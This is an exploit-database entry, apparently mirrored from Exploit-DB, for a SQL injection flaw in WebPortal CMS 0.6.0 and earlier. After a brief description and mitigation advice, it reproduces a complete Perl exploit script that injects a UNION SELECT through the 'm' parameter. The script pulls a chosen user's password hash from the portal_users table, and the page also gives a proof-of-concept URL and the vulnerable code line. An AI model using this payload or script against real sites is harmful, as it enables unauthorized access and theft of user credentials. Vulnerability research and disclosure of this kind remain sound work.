WebPortal CMS - exploit.company

vendor:

WebPortal CMS

by:

x0kster

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WebPortal CMS

Affected Version From: <= 0.6.0

Affected Version To: <= 0.6.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

WebPortal CMS <= 0.6.0 Remote Sql Injection Exploit

This exploit takes advantage of a SQL injection vulnerability in the WebPortal CMS <= 0.6.0. By manipulating the 'm' parameter in the URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the portal_users table. The vulnerability exists in the index.php file where the 'm' parameter is not properly sanitized before being used in a SQL query.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a version of WebPortal CMS that is not affected by this vulnerability. Additionally, ensure that register_globals is turned off, warning messages are enabled, and magic_quotes_gpc is turned on to prevent similar SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# WebPortal CMS <= 0.6.0 Remote Sql Injection Exploit
# Script Site : webportal.ivanoculmine.com
# by x0kster - x0kster[AT]gmail[DOT]com
# PoC : http://site/index.php?m=index.php?m=-1'+union+select+1,concat(uname,0x3a,pass),3,4,5,6,7+from+portal_users+where+id=1/*
# Note : For work register_globals is must be turned on and warning messages too and magic_quotes_gpc must be turned off.
# Vuln Code in index.php:
# <?php
#  [...]
#  if (isset($m)) {
#  $result = db_query ("SELECT * FROM ".$prefix."modules WHERE id='$m';"); <- Vuln Code :-)
#  [...]
# ?>
# If we select an inesistent id of a mod, it'll try to include it.
# So we have a warning error with the hash!.

use LWP::UserAgent;
if (@ARGV < 2){
 print "---------------------------------------------------------------\n";
 print "WebPortal CMS <= 0.6.0 Remote Sql Injection Exploit by x0kster.\n";
 print "Usage : perl $0 site userid \n";
 print "Ex:     perl $0 http://localhost/webportal/ 1\n";
 print "Coded by x0kster -x0kster[AT]gmail[DOT]com   \n";
 print "---------------------------------------------------------------\n";
 exit();
 }
$b = LWP::UserAgent->new() or die "[-]LWP::UserAgent error.\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
print "[+]Exploiting.\n";
$host = $ARGV[0]."index.php?m=index.php?m=-1'+union+select+1,concat(uname,0x3a,pass),3,4,5,6,7+from+portal_users+where+id=".$ARGV[1]."/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$res->content =~ /([0-9a-fA-F]{32})/;
print "[+]Ok, hash for username with userid ".$ARGV[1]." is $1\n";
print "[+]Exploiting terminated.\n";
print "[+]Coded by x0kster\n";

# milw0rm.com [2007-12-31]